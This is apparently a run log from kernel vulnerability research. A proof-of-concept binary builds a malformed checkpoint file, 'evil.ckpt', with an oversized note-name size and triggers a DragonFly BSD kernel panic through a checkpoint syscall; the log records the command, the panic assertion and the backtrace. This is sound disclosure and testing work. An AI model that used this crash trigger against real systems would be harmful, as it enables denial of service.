DF-0070 / run.2.log
=== DF-0070 run.2.log (panic mode, RUN 1 -- first observation, pre-reset) ===
Guest: same kernel, same snapshot.
Caller: root.
Command:
cd /tmp/df70 && /bin/sh -c "(./df0070 evil.ckpt) 2>&1; echo RUN_EXIT=$?"
$ ./df0070 evil.ckpt
[*] DF-0070 PoC: building evil.ckpt (notesz=880, n_namesz=0x10000000, n_descsz=120, mode=panic)
[*] calling sys_checkpoint(CKPT_THAW, fd=3, pid=-1, retval=0) [syscall #467]...
<shell tool terminated command after exceeding timeout 120000 ms>
<ssh session gone: guest panicked>
Panic signature (RUN 1) from dfbsd-qemu/boot.log:
panic: assertion "obj != NULL" failed in vm_object_hold_shared at /usr/src/sys/vm/vm_object.c:330
cpuid = 0
Trace beginning at frame 0xfffff800ab88b338
vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf
vm_object_hold_shared() at vm_object_hold_shared+0x3f 0xffffffff809ab0cf
vm_fault() at vm_fault+0x408 0xffffffff8099d7c8
trap_pfault() at trap_pfault+0x9a 0xffffffff80bd49da
trap() at trap+0x17c 0xffffffff80bd52dc
calltrap() at calltrap+0x9 0xffffffff80b9890a
--- trap 000000000000000c, rip = ffffffff80bca038, rsp = fffff800ab88b750, rbp = fffff800ab88b7b8 ---
memmove() at memmove+0x28 0xffffffff80bca038
Debugger("panic")
CPU0 stopping CPUs: 0x00000002
stopped
Stopped at Debugger+0x7c: movb $0,0xbd77f9(%rip)
db>
RUN 1 vs RUN 2 code offsets are byte-identical; only frame addresses differ (KVM randomisation between boots).